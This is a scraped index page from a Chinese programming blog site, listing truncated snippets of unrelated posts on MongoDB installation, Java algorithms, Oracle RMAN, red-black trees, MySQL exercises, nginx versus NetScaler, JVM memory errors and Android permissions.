      linux下安装mongodb 1)官网下载mongodb-linux-x86_64-rhel62-3.0.4.gz 2)linux 解压  gzip -d mongodb-linux-x86_64-rhel62-3.0.4.gz; mv mongodb-linux-x86_64-rhel62-3.0.4 mongodb-linux-x86_64-rhel62-
  • 编程之美-最短摘要的生成 bylijinnan java数据结构算法编程之美
    import java.util.HashMap; import java.util.Map; import java.util.Map.Entry; public class ShortestAbstract { /** * 编程之美 最短摘要的生成 * 扫描过程始终保持一个[pBegin,pEnd]的range,初始化确保[pBegin,pEnd]的ran
  • json数据解析及typeof chengxuyuancsdn jstypeofjson解析
    // json格式 var people='{"authors": [{"firstName": "AAA","lastName": "BBB"},' +' {"firstName": "CCC&
  • 流程系统设计的层次和目标 comsci 设计模式数据结构sql框架脚本
                                  流程系统设计的层次和目标  
  • RMAN List和report 命令 daizj oraclelistreportrman
    LIST 命令 使用RMAN LIST 命令显示有关资料档案库中记录的备份集、代理副本和映像副本的 信息。使用此命令可列出: • RMAN 资料档案库中状态不是AVAILABLE 的备份和副本 • 可用的且可以用于还原操作的数据文件备份和副本 • 备份集和副本,其中包含指定数据文件列表或指定表空间的备份 • 包含指定名称或范围的所有归档日志备份的备份集和副本 • 由标记、完成时间、可
  • 二叉树:红黑树 dieslrae 二叉树
        红黑树是一种自平衡的二叉树,它的查找,插入,删除操作时间复杂度皆为O(logN),不会出现普通二叉搜索树在最差情况时时间复杂度会变为O(N)的问题.     红黑树必须遵循红黑规则,规则如下     1、每个节点不是红就是黑。     2、根总是黑的  &
  • C语言homework3,7个小题目的代码 dcj3sjt126com c
    1、打印100以内的所有奇数。 # include <stdio.h> int main(void) { int i; for (i=1; i<=100; i++) { if (i%2 != 0) printf("%d ", i); } return 0; }  2、从键盘上输入10个整数,
  • 自定义按钮, 图片在上, 文字在下, 居中显示 dcj3sjt126com 自定义
    #import <UIKit/UIKit.h> @interface MyButton : UIButton -(void)setFrame:(CGRect)frame ImageName:(NSString*)imageName Target:(id)target Action:(SEL)action Title:(NSString*)title Font:(CGFloa
  • MySQL查询语句练习题,测试足够用了 flyvszhb sqlmysql
    http://blog.sina.com.cn/s/blog_767d65530101861c.html 1.创建student和score表 CREATE  TABLE  student ( id  INT(10)  NOT NULL  UNIQUE  PRIMARY KEY  , name  VARCHAR
  • 转:MyBatis Generator 详解 happyqing mybatis
      MyBatis Generator 详解 http://blog.csdn.net/isea533/article/details/42102297   MyBatis Generator详解 http://git.oschina.net/free/Mybatis_Utils/blob/master/MybatisGeneator/MybatisGeneator.
  • 让程序员少走弯路的14个忠告 jingjing0907 工作计划学习
      无论是谁,在刚进入某个领域之时,有再大的雄心壮志也敌不过眼前的迷茫:不知道应该怎么做,不知道应该做什么。下面是一名软件开发人员所学到的经验,希望能对大家有所帮助   1.不要害怕在工作中学习。 只要有电脑,就可以通过电子阅读器阅读报纸和大多数书籍。如果你只是做好自己的本职工作以及分配的任务,那是学不到很多东西的。如果你盲目地要求更多的工作,也是不可能提升自己的。放
  • nginx和NetScaler区别 流浪鱼 nginx
    NetScaler是一个完整的包含操作系统和应用交付功能的产品,Nginx并不包含操作系统,在处理连接方面,需要依赖于操作系统,所以在并发连接数方面和防DoS攻击方面,Nginx不具备优势。 2.易用性方面差别也比较大。Nginx对管理员的水平要求比较高,参数比较多,不确定性给运营带来隐患。在NetScaler常见的配置如健康检查,HA等,在Nginx上的配置的实现相对复杂。 3.策略灵活度方
  • 第11章 动画效果(下) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • FAQ - SAP BW BO roadmap blueoxygen BOBW
    http://www.sdn.sap.com/irj/boc/business-objects-for-sap-faq   Besides, I care that how to integrate tightly.   By the way, for BW consultants, please just focus on Query Designer which i
  • 关于java堆内存溢出的几种情况 tomcat_oracle javajvmjdkthread
    【情况一】:    java.lang.OutOfMemoryError: Java heap space:这种是java堆内存不够,一个原因是真不够,另一个原因是程序中有死循环;   如果是java堆内存不够的话,可以通过调整JVM下面的配置来解决:   <jvm-arg>-Xms3062m</jvm-arg>   <jvm-arg>-Xmx
  • Manifest.permission_group权限组 阿尔萨斯 Permission
    结构 继承关系 public static final class Manifest.permission_group extends Object java.lang.Object android. Manifest.permission_group 常量 ACCOUNTS 直接通过统计管理器访问管理的统计 COST_MONEY可以用来让用户花钱但不需要通过与他们直接牵涉的权限 D
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他